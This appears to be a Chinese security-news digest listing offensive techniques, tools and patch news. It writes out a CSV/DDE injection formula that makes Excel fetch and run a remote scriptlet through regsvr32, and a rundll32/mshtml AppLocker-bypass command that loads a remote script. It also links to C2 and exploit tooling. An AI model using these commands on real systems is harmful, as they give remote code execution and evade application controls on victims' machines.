Microsoft Excel CSV代码执行/注入方法；构建指挥与控制基础设施：C2K

姿势

1.stack privot ROP链备忘单

Billy Ellis示出了如何利用stack privot的执行ROP链/有效载荷的备忘单。stack privot，该技巧是劫持栈指针指向攻击者所能控制的内存处，然后再在相应的位置进行ROP。

Twitter链接

https://twitter.com/bellis1000/status/974273193769951238

2.Microsoft Excel CSV代码执行/注入方法

利用Microsoft Excel执行公式和CSV分析，以便通过欺骗用户打开特制CSV文件来实现远程代码执行。

1fillerText1,fillerText2,fillerText3,=MSEXCEL|'\..\..\..\Windows\System32\regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''

Twitter链接

https://xorl.wordpress.com/2017/12/11/microsoft-excel-csv-code-execution-injection-method/

3.绕过Applocker

使用Using JavaScript-Mshtml进行VBS加密，达到执行命令的目的：

1rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://gist.githubusercontent.com/homjxi0e/92ccf1b4113ffdefe1d191c4a3091a35/raw/329ec5a05b633e468a3596bddbb42ba2c6210af5/harr0ey.lol")

Twitter链接

https://twitter.com/harr0ey/status/976607600744828928

神器

1.WhatCMS:基于Whatcms.org API的CMS检测和利用工具包

Whatcms.sh目前可以检测到使用超过330个不同的CMS应用程序和服务，以便稍后为检测到的CMS 指出有效的安全审核工具列表。用法：

cms列表：

https://whatcms.org/Content-Management-Systems

工具链接：

https://www.kitploit.com/2018/03/whatcms-cms-detection-and-exploit-kit.html?utm_source=dlvr.it&utm_medium=twitter

2.001SPARTaN/aggressor_scripts

将Cobalt Strike 的log进行可视化

github链接：

https://github.com/001SPARTaN/aggressor_scripts/blob/master/visualizations/logvis.cna

3.CVE-2018-7273 - PoC

Linux Kernel 'drivers/block/floppy.c' 安全限制绕过漏洞（CVE-2018-7273）,该漏洞由于使用％p formater而不是显示函数名称来显示其地址,漏洞位置在show_floppy函数处。Linux kernel 4.15.4及之前版本在实现上存在安全漏洞，成功利用后可使攻击者获取敏感信息。

参考链接：

https://remoteawesomethoughts.blogspot.kr/2018/03/cve-2018-7273-poc.html

4.构建指挥与控制基础设施：C2K

C2K又名命令和控制工具包，是一个bash脚本，用于加速C2构建和任务的过程。新设计允许用户轻松快速地移除，添加或编辑完成工作所需的功能。目前C2K提供以下功能：

1部署Cobalt Strike团队服务器

2为HTTP C2实例部署Apache mod_rewrite重定向

3将HTTPS支持添加到HTTP C2实例

4为C2流量配置防火墙规则

5锁定对C2的SSH访问

6配置终端记录

7在C2实例上配置Logwatch

手动添加的功能：

1将Cobalt Strike信标事件整合到Slack中

2将Digital Ocean性能警报集成到Slack中

3使用Digital Ocean doctlCLI创建全球基础设施防火墙

文章的技术细节可以参考：

https://www.blackhillsinfosec.com/how-to-build-a-command-control-infrastructure-with-digital-ocean-c2k-revamped/

资讯

1.使用Bitwarden检查你的密码是否安全

Bitwarden是开源跨平台密码管理器，最新版本中加入了PwnedPasswords API，用来检查你现在使用的密码是否在已知的数据泄露事件被曝光。

https://twitter.com/bitwarden_app/status/976822321922039809

2.Drupal宣布将在3月28日发布高危漏洞补丁

Drupal是使用PHP语言编写的开源内容管理框架（CMF），它由内容管理系统（CMS）和PHP开发框架（Framework）共同构成。Drupal将于2018年3月28日18:00至19:30 UTC发布Drupal 7.x，8.3.x，8.4.x和8.5.x安全版。

参考链接

https://www.drupal.org/psa-2018-001

欢迎酷爱技术的你来破壳交流。